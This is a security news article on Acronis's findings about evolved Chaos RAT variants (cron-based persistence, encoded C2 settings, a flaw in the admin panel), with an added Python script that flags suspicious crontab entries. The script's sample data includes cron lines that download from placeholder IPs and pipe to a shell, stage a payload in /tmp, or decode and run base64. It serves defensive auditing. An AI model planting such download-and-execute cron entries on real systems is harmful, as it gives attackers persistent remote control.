Acronis Uncovers New Chaos RAT Malware

The Acronis Threat Research Unit (TRU) has identified newly evolved variants of Chaos RAT, a remote access trojan now actively deployed in attacks against both Linux and Windows environments. Originally published on GitHub as an open-source system administration tool, Chaos RAT has since been weaponized by threat actors for espionage, data exfiltration, and ransomware operations, with an emphasis on stealth and long-term persistence.

First observed in 2022, the malware has evolved significantly. The 2025 samples show improved obfuscation, broader platform compatibility, and stronger evasion techniques. Acronis researchers found one of the latest variants in a malicious archive named “NetworkAnalyzer.tar.gz,” submitted to VirusTotal from India. It most likely reached victims through phishing campaigns or compromised websites, posing as a network diagnostic tool for Linux.

Persistent access and risk to open-source ecosystems

These Chaos RAT variants maintain persistent access by installing cron jobs that periodically fetch updated payloads from a remote server. The same technique has been seen in earlier cryptocurrency-mining campaigns: because the scheduled task re-downloads the payload on every run, attackers can update the implant without reinfecting the host, which points to a long-term foothold strategy rather than a one-off compromise.
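Because the report describes the persistence mechanism but does not reproduce the actual cron entry, a defender's practical takeaway is to audit scheduled tasks for the download-and-execute pattern itself. The following Python script is an added example, not code from Acronis or from the Chaos RAT project: it parses crontab text and flags entries that download remote content and pipe it to a shell, run binaries from world-writable temporary directories, or decode an embedded payload before executing it. The crontab lines embedded below are constructed for illustration; none of the hosts, paths, or strings are indicators from the report.

```python
import re
from typing import Dict, List

# Constructed sample crontab (NOT real indicators). One benign header comment,
# two legitimate jobs, and three entries shaped like remote-update persistence.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/bin/curl -s http://198.51.100.23/update.sh | /bin/sh
@reboot wget -q -O /tmp/.x http://203.0.113.7/payload && chmod +x /tmp/.x && /tmp/.x
30 4 * * 0 /opt/backup/run.sh
*/10 * * * * echo 'ZWNobyBoaQ==' | base64 -d | bash
"""

# Heuristics for the three behaviours we care about. These are assumptions about
# what "fetch and run" usually looks like on Linux, not signatures from the report.
DOWNLOADER = re.compile(r"\b(curl|wget|fetch)\b")
URL = re.compile(r"https?://\S+")
PIPE_TO_SHELL = re.compile(r"\|\s*(/bin/)?(ba|z|da)?sh\b")
TMP_EXEC = re.compile(r"(/tmp|/dev/shm|/var/tmp)/\S+")
DECODE_EXEC = re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(/bin/)?(ba|z|da)?sh\b")


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split user-crontab text into {schedule, command} entries, skipping
    blank lines and comments. Handles both '*/5 * * * *' and '@reboot' forms.
    (System crontabs such as /etc/crontab carry an extra user field; adapt
    the split if you point this at those.)"""
    entries: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            schedule, _, command = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue  # malformed line, not a runnable job
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append({"schedule": schedule, "command": command})
    return entries


def flag_suspicious(entries: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return the entries whose command matches a fetch-and-execute pattern,
    each annotated with the reasons it was flagged."""
    flagged: List[Dict[str, object]] = []
    for entry in entries:
        cmd = entry["command"]
        reasons: List[str] = []
        if DOWNLOADER.search(cmd) and URL.search(cmd):
            reasons.append("downloads remote content on a schedule")
            if PIPE_TO_SHELL.search(cmd):
                reasons.append("pipes the download straight into a shell")
            if TMP_EXEC.search(cmd):
                reasons.append("stages or runs a file from a temp directory")
        if DECODE_EXEC.search(cmd):
            reasons.append("base64-decodes an embedded payload and executes it")
        if reasons:
            flagged.append({**entry, "reasons": reasons})
    return flagged


def audit_crontab(text: str) -> List[Dict[str, object]]:
    """Convenience wrapper: parse, then flag."""
    return flag_suspicious(parse_crontab(text))


if __name__ == "__main__":
    for hit in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{hit['schedule']}] {hit['command']}")
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

In practice you would feed it the output of `crontab -l` for every account, plus the contents of `/etc/cron.d/`, `/etc/cron.*`, and any systemd timers, and treat a hit as a starting point for triage rather than a verdict: a legitimate updater can match these patterns, but one that appeared without a change ticket, points at a bare IP, or executes from `/tmp` deserves a closer look.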


Significantly, the Acronis team found a critical vulnerability in Chaos RAT’s administration panel, allowing remote code execution on the controlling server. Although this flaw doesn’t directly affect victim endpoints, it raises the possibility of one malicious operator hijacking another’s infrastructure—highlighting security risks within cybercriminal supply chains.

Advanced evasion signals greater challenge for defenders

Where earlier Chaos RAT versions stored sensitive configuration data such as command-and-control IP addresses and ports in plain text, the latest sample stores them as encoded strings that are unpacked at runtime by custom decoding routines, slowing down static analysis and signature-based detection. This progression shows how a tool that began as openly available, readable code can be steadily hardened against analysis once criminals take it over.

The findings are a warning to organizations that rely on open-source tooling, and they underscore the value of regular security audits (including of persistence mechanisms such as cron), behavior-based detection rather than reliance on static indicators alone, and threat intelligence sharing to get ahead of evolving threats like Chaos RAT.
